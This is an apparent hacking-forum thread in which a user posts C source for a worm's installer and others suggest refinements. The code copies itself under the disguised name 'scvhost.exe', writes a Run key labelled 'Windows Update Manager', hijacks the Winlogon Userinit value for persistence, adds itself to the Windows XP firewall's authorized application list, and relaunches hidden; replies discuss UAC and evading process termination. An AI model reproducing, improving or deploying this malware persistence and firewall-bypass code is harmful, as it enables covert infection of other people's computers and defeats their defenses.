Autostart after Winlogon, FWBypass.

**krizzle** · 07-01-2010

I was bored today and coded this autostart method,
Detects vista and copy to %appdata% so it can run under the right name.
For all another will create enty under winlogon to start.
And bypass firewall.

Code:

#include <windows.h>
#include <shellapi.h> 
#include <stdio.h>

BOOL IsVista()
{
   OSVERSIONINFO vi;
   ZeroMemory(&vi, sizeof(vi));
   vi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
   GetVersionEx( &vi );
   return  (vi.dwMajorVersion == 6 );
}

int main()
{
	char appdata[] = "%appdata%";
	char worm_file[] = "scvhost.exe";
	char mutax[] = "D59CIFN53";
	
        //MUTEX
	HANDLE muh;
	muh = CreateMutex(NULL, FALSE, mutax);
	if (GetLastError() == ERROR_ALREADY_EXISTS)
	ExitProcess(0);
	
	//INSTALLER
	HKEY hndKey = NULL;
	char fullpath[MAX_PATH], Path[MAX_PATH], sys[MAX_PATH], vista[MAX_PATH];
	GetModuleFileNameA( GetModuleHandleA(NULL), fullpath, sizeof(fullpath) );
	
	if (IsVista()) 
         {
	  //lets copy to %appdata% 
   	  ExpandEnvironmentStrings(appdata, vista, sizeof(vista));
	  _snprintf( Path, sizeof(Path), "%s\\%s", vista, worm_file);
	  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL, &hndKey, NULL);
	  RegSetValueEx(hndKey,"Windows Update Manager",0, REG_SZ,(const unsigned char *)Path,strlen(Path));
	  RegCloseKey(hndKey);
	 }
 
    else
     { 
	   GetSystemDirectory(sys,MAX_PATH);
       _snprintf( Path, sizeof(Path), "%s\\%s", sys, worm_file ); 
       //fw bypass xp
	   char pfad[256];
	   _snprintf(pfad, sizeof(pfad),"%s:*:Enabled:%s", fullpath, "Userinit");
	   RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hndKey, 0);
	   RegSetValueEx(hndKey, fullpath, 0, REG_SZ, (const unsigned char *)pfad, strlen(pfad));
	   RegCloseKey(hndKey);
	   //winlogon autostart
	   char reqpath[256];
	   _snprintf(reqpath, sizeof(reqpath),"%s\\userinit.exe,%s", sys, Path);
	   RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL, &hndKey, NULL);
	   RegSetValueEx(hndKey, "Userinit", 0, REG_SZ, (const unsigned char *)reqpath, strlen(reqpath));
	   RegCloseKey(hndKey);
	   }

	  if( strcmp( fullpath, Path ) != 0 )
      {
        CopyFileA(fullpath, Path, FALSE);
        SetFileAttributes( Path , FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY );
        ShellExecute( NULL, "open", Path, NULL, NULL, SW_HIDE );
		ExitProcess( 0 );
	   }
	   
	return 0;
}

Unregistered · 07-01-2010

thnx krizzle

**darrenhzx** · 07-01-2010

does this bypass uac?

**krizzle** · 07-01-2010

No this does not bypass UAC.
It will start under %appdata% bcos this works even on limited accounts under vista/win7 to run under the right file, in this situation it is "scvhost.exe".
You may not belive me but yes... ALOT users simple disable UAC byself, they are just pissed from the popup. Btw the first releases of WIN7 had problems with UAC.

**tgunn** · 07-01-2010

1) Why not just always copy to %appdata%\SomeSubDirectory\bot.exe?
2) Why not use unicode instead of multi-byte?

**raghavpande123** · 07-01-2010

correction:
use createprocess()
in place of:
ShellExecute( NULL, "open", Path, NULL, NULL, SW_HIDE );

becoz shellexecute will call the new process in the context of calling process and once the main process encounters exit(); then the new process will also be killed simultaneously.

**krizzle** · 08-01-2010

tgunn, wtf are you talkin about?
raghavpande123 you should change this yes, i use the installer in another prog and it works like that...

**tgunn** · 08-01-2010

I'm simply suggesting that for your install path you should use %appdata% and then some hidden subdirectory and then your exe, no matter what the OS it may be.
Also, I noticed that you specifically call the multibyte version of quite a few API functions, and I am wondering why you don't just do it in unicode instead.

**Pernat1y** · 08-01-2010

Originally Posted by raghavpande123

becoz shellexecute will call the new process in the context of calling process and once the main process encounters exit(); then the new process will also be killed simultaneously.

o rly? o_0

**raghavpande123** · 08-01-2010

Originally Posted by Pernat1y

o rly? o_0

well yeah ! the new process is also killed with exit function.
on xp service pack 3 it does.
on vista it does.
i dunno abt win7.
are u saying that it doesnt???? becoz if u are then please tell me why??

Thread: Autostart after Winlogon, FWBypass.

LinkBack

Thread Tools

Display

Autostart after Winlogon, FWBypass.

ki

Thread Information

Users Browsing this Thread

Similar Threads

Need FUD Winlogon Hijacker

OpenProcessToken cant open Process Winlogon.exe

Vista Autostart?

Autostart Manager Example

Posting Permissions